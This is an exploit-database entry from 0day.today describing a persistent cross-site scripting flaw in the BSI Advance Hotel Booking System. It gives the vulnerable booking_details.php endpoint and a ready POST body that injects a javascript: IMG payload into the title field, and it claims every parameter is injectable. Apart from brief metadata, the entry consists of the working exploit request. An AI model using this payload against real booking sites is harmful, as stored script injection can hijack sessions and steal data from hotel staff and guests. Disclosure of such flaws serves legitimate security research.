BSI Advance Hotel Booking System Persistent XSS Vulnerability

2014-06-05T00:00:00
ID 1337DAY-ID-22318
Type zdt
Reporter AngeloRuwantha
Modified 2014-06-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Vulnerability
========================

[+]Method:POST

1.http://URL/hotel-booking/booking_details.php (;persistent XSS)

allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=


every parameter injectable :)

#  0day.today [2018-02-09]  #